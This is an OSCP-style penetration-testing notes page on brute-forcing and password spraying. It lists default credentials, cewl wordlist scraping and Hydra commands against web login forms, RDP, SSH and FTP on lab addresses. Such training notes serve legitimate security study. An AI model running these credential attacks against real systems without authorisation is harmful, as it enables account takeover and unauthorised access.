> For the complete documentation index, see [llms.txt](https://oscp.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://oscp.adot8.com/web-applications/brute-forcing-and-spraying.md).

# Brute Forcing and Spraying

Common Usernames

```
root
admin
administrator
```

Common Passwords

```
admin
root
toor
password
Username:Username     <--- upercase first letter
username:username     <--- lowercase first letter
AppName:AppName       <--- Test upper and lower
```

Scrape website for potential passwords

```
cewl <url>
cewl --lower <url>
cewl --upper <url>
```

{% hint style="danger" %}
Test uppercase and lowercase
{% endhint %}

## Hydra

### Login Portals

#### Example 1

<figure><img src="/files/TXAiv8FTLJOdYB1EDcae" alt=""><figcaption></figcaption></figure>

* Capture in Burp

<figure><img src="/files/jXHx5C5nEWAJm48f52y3" alt=""><figcaption></figcaption></figure>

* Username and Password converted to base64 upon sending
* Error code 403 = failed

```
hydra -I -f -L usernames.txt -P passwords.txt 'http-post-form://192.168.165.61:8081/service/rapture/session:username=^USER64^&password=^PASS64^:C=/:F=403'
```

`hydra -I -vV -f -L users.txt -P passwords.txt 'http-post-form://192.168.165.61:8081/service/rapture/session:username=^USER64^&password=^PASS64^:C=/:F=403'`

* I - ignore restore files
* vV - verbose mode
* f - stop upon success
* L - username list
* P - password list
* ^USER64^ ^PASS64^ - placements for username and password + base64 encode
* C=/ - establish session cookies at the URL
* F=403 - HTTP 403 means invalid login

#### Example 2

<figure><img src="/files/RlmPQ0OMNEJ16hpcYoVF" alt=""><figcaption></figcaption></figure>

```
hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 
http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"
```

<figure><img src="/files/v3dblmMpwCorlTFbW92C" alt=""><figcaption></figcaption></figure>

```
hydra -l admin -P ~/rockyou.txt http-get://192.168.178.201 -vV
```

### Other services

```
hydra -vV -L names.txt -p 'SuperS3cure1337#' 192.168.178.202 rdp -t 10
hydra -vV -l itadmin -P ~/rockyou.txt 192.168.178.202 -t 10 ssh
hydra -vV -l itadmin -P ~/rockyou.txt 192.168.178.202 -t 10 ftp
```
